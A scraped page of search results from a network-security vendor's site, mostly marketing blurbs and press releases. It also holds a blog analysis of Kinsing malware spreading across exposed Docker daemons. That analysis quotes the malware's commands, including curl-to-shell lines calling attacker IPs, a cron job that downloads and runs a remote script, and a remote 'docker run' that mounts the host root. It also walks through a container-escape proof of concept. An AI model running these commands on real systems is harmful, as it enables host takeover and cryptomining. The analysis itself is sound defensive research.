top of page

Search results

645 results found with an empty search

  • Micro-segmentation – from Strategy to Execution | AlgoSec

    A ZeroTrust network architecture mitigates risk by only providing the minimally required access to your network resources But implementing it is easier said than done Webinars Micro-segmentation – from Strategy to Execution Organizations heavily invest in security solutions to keep their networks safe, but still struggle to close the security gaps. Micro-segmentation helps protect against the lateral movement of malware and minimizes the risk of insider threats. Micro-segmentation has received lots of attention as a possible solution, but many IT security professionals aren’t sure where to begin or what approach to take. In this practical webinar, Prof. Avishai Wool, AlgoSec’s CTO and co-founder will guide you through each stage of a micro-segmentation project – from developing the correct micro-segmentation strategy to effectively implementing it and continually maintaining your micro-segmented network. Register now for this live webinar and get a practical blueprint to creating your micro-segmentation policy: What is micro-segmentation. Common pitfalls in micro-segmentation projects and how to avoid them. The stages of a successful micro-segmentation project. The role of policy change management and automation in micro-segmentation. Don’t forget to also click on the links in the Attachments tab. July 7, 2020 Prof. Avishai Wool CTO & Co Founder AlgoSec Relevant resources Microsegmentation Defining Logical Segments Watch Video Micro-Segmentation based Network Security Strategies Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | The Facebook outage and network configuration

    Avishai Wool, CTO at AlgoSec, analyses the recent Facebook outage and the risks all organizations face in network configuration Social... Cyber Attacks & Incident Response The Facebook outage and network configuration Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/6/21 Published Avishai Wool, CTO at AlgoSec, analyses the recent Facebook outage and the risks all organizations face in network configuration Social media giant Facebook was involved in a network outage on the 4th October 2021 that lasted for nearly six hours and took its sister platforms Instagram and WhatsApp offline. As the story developed, it became apparent that the incident was caused by a configuration issue within Facebook’s BGP (Border Gateway Protocol), one of the systems that the internet uses to get your traffic where it needs to go as quickly as possible. The outage also cut off the company’s internal communications, along with authentication to third-party services including Google and Zoom. Some reports suggested security passes went offline, which stopped engineers from entering the building to physically reset the data center. The impact was felt worldwide, with Downdetector recording more than 10 million problem reports, the largest number for one single incident. Facebook released an official statement following the outage stating: “Our engineering teams learned that configuration changes on the backbone routers that coordinate network traffic between our data centers caused issues that interrupted this communication.” While Facebook has assured its users that no data has been lost in this process, the outage is a stark reminder of how small configuration errors can have huge, far-reaching consequences. The fundamentals of application availability At the fundamental level, Facebook suffered from a lack of application availability. When a change was actioned, it caused a major chain reaction that ultimately wiped Facebook and its related services from the internet because they couldn’t see the entire lifecycle of that change and the impact it would have. To avoid an incident like this in the future, organizations should consider a few simple steps: Back up configuration files to allow for rollbacks should an issue arise Use a test system alongside live processes to run scenarios without causing any disruptions Retain low-tech alternatives to guarantee access to the network if the primary route fails The outages across Facebook’s infrastructure highlight the operational risks all organizations face around faulty configuration changes which can drastically impact application availability. Intelligent automation, thorough change management and proactive checks are key to avoid these outages. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec Introduces New Integration with IBM Resilient to Accelerate Incident Response

    AlgoSec’s incident response integration extends collaboration to add critical business context to incident information and automates threat remediation AlgoSec Introduces New Integration with IBM Resilient to Accelerate Incident Response AlgoSec’s incident response integration extends collaboration to add critical business context to incident information and automates threat remediation February 28, 2019 Speak to one of our experts Ridgefield Park, NJ (February 28, 2019) – AlgoSec , the leading provider of business-driven network security management solutions, today announced a new integration with the IBM® Resilient® Incident Response Platform (IRP), enabling organizations to tie security incidents and attacks directly to the business processes that could be impacted. AlgoSec’s integration provides security analysts with the ability to enrich the Resilient IRP with critical business and network context to immediately assess an incident’s potential business impact, and to prioritize and automate remediation efforts accordingly. Leveraging Resilient’s open application programming interfaces (API), the AlgoSec integration with Resilient allows joint users to: Quickly highlight in the Resilient dashboard which applications are impacted by an incident, and how business-critical those applications are Automatically associate security incidents with the applications, servers, network connectivity flows and security devices impacted by an attack Identify network connectivity to and from compromised servers, such as connectivity to the internet or to sensitive networks Automatically implement change requests to quickly isolate compromised servers from the rest of the network and the public Internet Get key insights to assist with cyber-threat forensics and compliance reporting With this new integration, security analysts can quickly reduce the impact of attacks on the business. The AlgoSec integration for the Resilient IRP helps block attempts at data exfiltration and makes it more difficult for hackers to move laterally within the network from affected servers. The integration helps organizations to streamline and accelerate their IR processes by automating time-consuming security changes and proactively analysing business risk. “SOC teams need to quickly sift through the volumes of complex alerts they receive each day, to identify the attacks that could affect key business processes and take action before they cause disruption and damage,” said Anner Kushnir, VP of Technology at AlgoSec. “The new AlgoSec integration with IBM Resilient enables joint customers to link cyber-attacks directly to the business applications that are being targeted, and then prioritize and automate their remediation efforts based on the attack’s severity and risk to the business –aligning incident response processes with the overall business strategy.” As part of this integration, AlgoSec has extended their offerings on the IBM Security App Exchange , a marketplace where developers across the industry can share applications based on IBM Security technologies. As threats are evolving faster than ever, collaborative development amongst the cyber community will help organizations adapt quickly and speed innovation in the fight against cybercrime. About AlgoSec The leading provider of business-driven network security management solutions, AlgoSec helps the world’s largest organizations align security with their mission-critical business processes. With AlgoSec, users can discover, map and migrate business application connectivity, proactively analyze risk from the business perspective, tie cyber-attacks to business processes and intelligently automate network security changes with zero touch – across their cloud, SDN and on-premise networks. Over 1,800 enterprises , including 20 of the Fortune 50, have utilized AlgoSec’s solutions to make their organizations more agile, more secure and more compliant – all the time. Since 2005, AlgoSec has shown its commitment to customer satisfaction with the industry’s only money-back guarantee. All product and company names herein may be trademarks of their registered owners. *** Media Contacts:Tsippi [email protected] Craig CowardContext Public [email protected]+44 (0)1625 511 966

  • Our customers | AlgoSec

    Discover how global customers use Algosec to enhance their network security, streamline operations, and ensure continuous compliance. Our customers Financial Services Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more We empower the world’s most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network. NCR Nationwide Insurance Testimonial See what people who use AlgoSec have to say about it Read customers stories Filter by industry All industries Energy and Utilities Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Government Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Healthcare & Pharmaceuticals Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Motor Vehicles Read the story Read the story Read the story Read the story Read the story Read the story Show more Technology Read the story Read the story Show more Retail and Consumer Goods Read the story Read the story Read the story Read the story Read the story Read the story Show more Telecom, IT, MSSP Read the story Read the story Read the story Read the story Read the story Read the story Read the story Read the story Show more Transportation Read the story Show more Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec Vs. Tufin

    With AlgoSec you will manage your network security confidently, no matter where your network lives Gain complete visibility, automate changes, and always be compliant AlgoSec vs. Tufin See how AlgoSec stacks up against Tufin Schedule a demo Stop managing rules, start securing applications. Bid goodbye to Tufin: Master hybrid security with AlgoSec. AlgoSec is an application-centric security management platform that eliminates the pain of hybrid network security management by focusing on what your applications need—because that is how your business runs. By automatically discovering applications and their connectivity, visualizing the full hybrid network security topology across cloud and on-prem environments, and enforcing micro-segmentation, AlgoSec enables security teams to prioritize risk based on real business impact rather than static rules. The result is faster, safer network changes with continuous visibility, compliance, and control across the entire hybrid infrastructure. Micro-segment successfully Master micro-segmentation. Define and enforce network segmentation throughout your entire hybrid network. Be confident that your network security policies won’t violate your network segmentation strategy. Get a demo > Visualize & analyze your application connectivity Micro-segment successfully Master micro-segmentation. Define and enforce network segmentation throughout your entire hybrid network. Be confident that your network security policies won’t violate your network segmentation strategy. Get a demo > Automatically discover applications and services Never misplace an application on your network. Automatically discover and identify your business applications and their network connectivity. Get a demo > Visualize your entire network Instantly visualize your entire hybrid network security topology – in the cloud, on-premises, and everything in between. Understand the impact of network security policies on traffic, quickly troubleshoot connectivity issues Get a demo > Connect applications to security policy rules Firewall rules support applications or processes that require network connectivity to and from specific servers, users, and networks. With Horizon AppViz, automatically associate the relevant business applications that each firewall rule supports, enabling you to review the firewall rules quickly and easily Get a demo > Bid Goodbye To Tufin & Get Started With AlgoSec Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue © 2004-2023 All rights reserved by AlgoSec

  • AlgoSec resident engineer | AlgoSec

    AlgoSec Resident Engineer Services provides a dedicated onsite remote engineer for support, maintenance, management issues to fit your network security needs AlgoSec resident engineer AlgoSec resident engineer service Dedicated onsite/remote engineer The AlgoSec Resident Engineer Service Pack is a comprehensive service with a dedicated technical engineer that acts as a partner and advisor. The AlgoSec Resident Engineer (ARE) typically devotes at least one day a week to helping you accelerate your network security management and achieve immediate success. The AlgoSec Resident Engineer becomes the expert in your organization’s processes and requirements as well as in your network’s specific configurations and challenges – delivering higher business value faster. Even when your organization has staffing changes, the AlgoSec Resident Engineer preserves organizational memory, ensuring a seamless transition and accelerating the onboarding of new employees so you aren’t left behind. View detailed information The business impact: Exclusive access to AlgoSec R&D and product management Consultancy to address your business needs Dedicated technical engineer Expertise, training, and knowledge sharing Accelerate adoption Business continuity during staffing transitions Enhance workforce productivity AlgoSec resident
engineer Read document Relevant resources Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* Long answer Send message

  • AlgoSec Teams with TD SYNNEX to Take Partner and Customer Service to New Heights

    The new alliance is designed to meet the growing needs of AlgoSec’s partners and customers to maintain their competitiveness by delivering enhanced services AlgoSec Teams with TD SYNNEX to Take Partner and Customer Service to New Heights The new alliance is designed to meet the growing needs of AlgoSec’s partners and customers to maintain their competitiveness by delivering enhanced services October 2, 2022 Speak to one of our experts RIDGEFIELD PARK, N.J., October 3, 2022 – AlgoSec, a global cybersecurity leader in securing application connectivity, has announced its new alliance with TD SYNNEX, a leading global distributor and solutions aggregator for the IT ecosystem. This partnership will enable AlgoSec’s partners to leverage a whole host of customer-centric resources. These include extended partner support and key customer touchpoint services through TD SYNNEX’s expansive distribution channels. AlgoSec partners working through TD SYNNEX Security Solutions will benefit from: Expedited SLAs on all AlgoSec quotes and orders within less than one business day Quarter-end extended hours Access to a dedicated AlgoSec Product Manager from SYNNEX AlgoSec Partners will still have AlgoSec Channel Managers. In addition, AlgoSec customers will enjoy an enhanced service offering, including: Hands-on cybersecurity expertise through TD SYNNEX Cyber Range Dedicated security focused team Pre-sales engineering support Vulnerability assessments, Bill of Materials (BoM), design Proof of Concept (PoC) “We are excited to add AlgoSec to our portfolio of products. Securing applications and managing policy management across hybrid networks is a major challenge for IT teams.” said Scott Young, Sr. Vice President, Strategic Procurement, TD SYNNEX. Jim Fairweather, AlgoSec VP Channels adds “I am fully confident that our partnership with TD SYNNEX will enable our channel partners to accelerate time to market and improve overall support to meet customer demands”. About AlgoSec  AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere.  The AlgoSec platform enables the world’s most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network.   AlgoSec’s patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture.  Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management.  See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com About TD SYNNEX TD SYNNEX (NYSE: SNX) is a leading global distributor and solutions aggregator for the IT ecosystem. We’re an innovative partner helping more than 150,000 customers in 100+ countries to maximize the value of technology investments, demonstrate business outcomes and unlock growth opportunities. Headquartered in Clearwater, Florida, and Fremont, California, TD SYNNEX’ 22,000 co-workers are dedicated to uniting compelling IT products, services and solutions from 1,500+ best-in-class technology vendors. Our edge-to-cloud portfolio is anchored in some of the highest-growth technology segments including cloud, cybersecurity, big data/analytics, IoT, mobility and everything as a service. TD SYNNEX is committed to serving customers and communities, and we believe we can have a positive impact on our people and our planet, intentionally acting as a respected corporate citizen. We aspire to be a diverse and inclusive employer of choice for talent across the IT ecosystem. For more information, visit www.TDSYNNEX.com or follow us on Twitter , LinkedIn , Facebook and Instagram .

  • Natilik and Rothschild | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. AlgoSec Case Study: Natilik and Rothschild Organization Natilik and Rothschild Industry Financial services Headquarters Download case study Share Customer
success stories AlgoSec Case Study: Natilik and Rothschild Interview details Interviewee: Robert Elgidge, Security Solutions Director at Natilik Company: Natilik, UK-based global managed service provider Client: Rothschild, a multinational financial services institution Background Natilik, a global managed service provider, collaborated with AlgoSec to address the complex security challenges faced by Rothschild, a financial services leader with over 60 offices in 40 countries and $2.5 billion in annual revenue. Rothschild’s operations include investment banking, asset management, and private banking, as well as advisory roles for governments. Given their critical global role, securing and streamlining their IT infrastructure was a top priority. As part of their modernization strategy, Natilik also leveraged AWS to support Rothschild’s expanding cloud footprint and used the AlgoSec Horizon platform to provide unified visibility and security management across both AWS and on-prem environments. This hybrid approach allowed Natilik to centralize security policy analysis, application connectivity mapping, and risk prioritization across firewalls, cloud controls, and distributed sites. Watch the interview: Natilik’s expertise spans five key solution areas: Collaboration and modern work : enabling seamless communication and productivity across teams. Customer engagement : enhancing customer experiences through tailored digital solutions. Modern networks : building secure, scalable, and high-performing network infrastructures. Multi-cloud and data centers : supporting hybrid and multi-cloud environments for agility and scalability. Cybersecurity : providing end-to-end protection, which underpins all other solution areas. Cybersecurity forms the backbone of their offerings, ensuring clients like Rothschild can navigate an evolving threat landscape while maintaining compliance and operational excellence. Primary use case Rothschild’s primary challenges stemmed from fragmented security policies and inefficient manual processes. According to Robert Elgidge: “Rothschild’s large global firewall estate led to poor visibility and cumbersome management. AlgoSec was introduced to simplify these complexities, but initially, the company struggled with change management, approvals, and deploying firewall rules. Although AlgoSec offered the technology and intelligence needed, a significant amount of manual work was required to align stakeholders and integrate workflows.” With the introduction of AWS into their hybrid architecture, Natilik used AlgoSec Horizon to bridge visibility gaps between cloud and on-prem environments. Horizon’s application-centric discovery and cross-environment policy analysis helped Natilik consolidate cloud security groups, optimize hybrid access rules, and ensure consistent enforcement across AWS and traditional firewalls. AlgoSec’s deployment ultimately allowed Rothschild to consolidate security policies and automate manual processes, reducing errors and freeing resources for higher-value projects. Most valuable features Robert highlighted several standout features of AlgoSec: “AlgoSec’s rule intelligence feature was crucial. It identified which firewall rules were essential and which could be removed, dramatically simplifying the structure. This optimization not only improved performance but also saved significant costs. Initially, Rothschild considered investing in new firewall infrastructure, but AlgoSec’s ability to streamline and prioritize existing rules negated that need. The resulting performance boost was substantial, avoiding unnecessary expenses and improving operational efficiency.” By focusing on rule prioritization and optimization, AlgoSec enhanced Rothschild’s security posture and operational outcomes. With the addition of AlgoSec’s cloud-native capabilities (via its Horizon/ACE architecture), this rule intelligence and optimization extends not only to physical and on-prem firewalls, but also to cloud-native firewalls and security-group configurations ensuring effective policy hygiene across hybrid and multi-cloud estates. Areas for improvement Despite AlgoSec’s benefits, Robert noted areas for potential improvement: “Internal challenges with workflows and approvals persisted. While AlgoSec provided the technical capabilities, a more tailored approach to building or improving management processes would have been helpful. The main difficulties lay in the bureaucratic side of things, such as aligning request and approval roles.” These challenges highlighted the importance of aligning organizational processes with advanced security technologies. Usage duration “My experience with AlgoSec began in 2022, during its deployment at Rothschild. Shortly after, I transitioned to another organization that also used AlgoSec, which gave me further insight into its capabilities across different environments.” Solution stability Robert praised AlgoSec’s reliability: “There were no stability issues. Once AlgoSec was fully integrated, it became the central authority for rule management. We removed manual admin rights from the technical team, ensuring all changes went through AlgoSec. This approach eliminated human error and reinforced the solution’s effectiveness.” This stability now also covers hybrid and cloud-native policy environments, so Rothschild benefits from the same governance and control whether rules apply to physical appliances or cloud firewalls. Customer service and support “The technical support team was highly skilled and responsive. However, in regions like Brazil, where collaboration often involves discussions and in-person meetings, a purely technical approach didn’t always fully address our needs. A more consultative support model could enhance the customer experience in these scenarios.” Initial setup “Deploying AlgoSec was challenging due to the complexity of Rothschild’s network. However, the technical support team acted quickly to address any issues, ensuring the implementation proceeded smoothly. Once the environment was stabilized, maintenance and ongoing use were straightforward.” Return on investment AlgoSec delivered a strong return on investment for Rothschild: “The money saved on after-hours work alone justified the tool within the first year. By optimizing firewall rules and automating workflows, we achieved significant operational savings. This freed up resources for other critical business initiatives, directly contributing to profitability.” With the addition of cloud-native policy management, Rothschild now sees potential additional savings by avoiding redundant firewall investments and streamlining cloud infrastructure as part of their hybrid estate. Pricing, setup costs, and licensing “Compared to other solutions like Tufin and FireMon, AlgoSec was competitively priced and stayed within budget. There were no significant additional costs apart from standard licensing fees. While we did hire new personnel to support change management, that was more related to internal processes than the technology itself.” Final insights Robert shared his advice for organizations considering AlgoSec: “AlgoSec is best suited for larger enterprises with complex environments, especially those with multiple firewall vendors and over 500 rules. For smaller setups, the added complexity of a dedicated solution might not be necessary. However, for businesses dealing with significant network complexity, AlgoSec simplifies management and delivers substantial value. With its cloud-native capabilities, hybrid-ready architecture, and unified policy management across on-prem and cloud, it’s more relevant than ever for organisations operating across diverse infrastructures.I’d rate it 10 out of 10 for companies with the right use case.” Schedule time with one of our experts

  • Network management & policy change automation | AlgoSec

    Automate network management and policy changes to increase efficiency, reduce errors, and ensure security compliance across your network infrastructure. Network management & policy change automation ---- ------- Schedule a Demo Select a size ----- Get the latest insights from the experts Choose a better way to manage your network

  • The 2024 State of Network Security Report Reveals a Shift Towards Multi-Cloud Environments, with a 47% Increase in SD-WAN and 25% Uptick in SASE Adoption

    The research found that organizations are prioritizing security, seamless integration, and compliance in hybrid cloud environments with Cisco, Palo Alto Networks, AWS and Microsoft Azure among the leaders The 2024 State of Network Security Report Reveals a Shift Towards Multi-Cloud Environments, with a 47% Increase in SD-WAN and 25% Uptick in SASE Adoption The research found that organizations are prioritizing security, seamless integration, and compliance in hybrid cloud environments with Cisco, Palo Alto Networks, AWS and Microsoft Azure among the leaders June 27, 2024 Speak to one of our experts RIDGEFIELD PARK, NJ, June 27, 2024 – Global cybersecurity leader AlgoSec has released its annual ‘The State of Network Security Report’ providing a broad view of network security in hybrid cloud environments, identifying the most popular strategies adopted by security professionals. The report sheds light on key market trends and highlights the solutions and technologies that are in demand and why, helping organizations to navigate the complexities of modern network security. Based on two comparative surveys conducted in H2 of 2022 and 2023, AlgoSec’s research evaluated market leaders including AWS, Microsoft Azure, Check Point, Palo Alto Networks, Cisco and more, identifying significant shifts in cloud platform adoption, deployment of firewalls and Software-Defined Wide Area Network (SD-WAN), as well as Secure Access Service Edge (SASE) implementation. Key findings from the report include: ● Security, continuity, and compliance driving cloud platform selection – When selecting a cloud platform, organizations prioritize seamless integration, compliance, and robust security features. While the overall adoption of cloud platforms has grown, the ranking of different vendors has remained relatively stable. Azure continues to be the most widely used platform, closely followed by AWS, which has shown the fastest pace of growth. ● The growing adoption of SD-WAN – The move towards remote working and cloud computing has been the catalyst for the increased deployment of SD-WAN, ensuring secure and reliable connections across multiple locations. That is reflected in the report, with a steep decline in the number of organizations that had no SD-WAN solution from 55.2% in 2022 to 34% in 2023. ● The rise in SASE adoption – With network infrastructures becoming more complex, SASE has become a popular solution for organizations, consolidating multiple security functions into a single, unified, cloud service. The report found the rate of SASE adoption has increased year-on-year, with notable growth of Zscaler implementation from 21.9% in 2022 to 37% in 2023, and Prisma access implementation from 16.2% in 2022 to 22.8% in 2023. ● The increasing importance of firewalls in cloud estates – With more businesses looking to secure corporate resources across complex cloud networks, firewall implementation has increased as a result, providing organizations with the means to safeguard against external threats. The rate of adoption has risen significantly, with only 7.1% of respondents saying they had no firewalls deployed in 2023 - a sharp drop from the 28.4% recorded in 2022. ● The persistence of hybrid networks – Despite the general shift towards cloud adoption, on-premise data centers and device rollouts remain a significant feature of the network landscape. “According to our research there has been greater adoption of cloud-based network security solutions across the board”, said Eran Shiff, VP Product of AlgoSec. “However, there is still progress to be made in the SD-WAN and SASE space. By identifying the key trends and the most popular solutions on the market, we can provide some much-needed clarity into the complex world of network security.” The full report can be accessed here . About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity and cloud-native applications throughout their multi-cloud and hybrid network. Trusted by more than 1,800 of the world’s leading organizations, AlgoSec’s application-centric approach enables secure acceleration of business application deployment by centrally managing application connectivity and security policies across the public clouds, private clouds, containers, and on-premises networks. Using its unique vendor-agnostic deep algorithm for intelligent change management automation, AlgoSec enables the acceleration of digital transformation projects, helps prevent business application downtime and substantially reduces manual work and exposure to security risks. AlgoSec’s policy management and CNAPP platforms provide a single source for visibility into security and compliance issues within cloud-native applications as well as across the hybrid network environment, to ensure ongoing adherence to internet security standards, industry, and internal regulations. Learn how AlgoSec enables application owners, information security experts, DevSecOps and cloud security teams to deploy business applications up to 10 times faster while maintaining security at https://www.algosec.com . 

  • AlgoSec | The importance of bridging NetOps and SecOps in network management

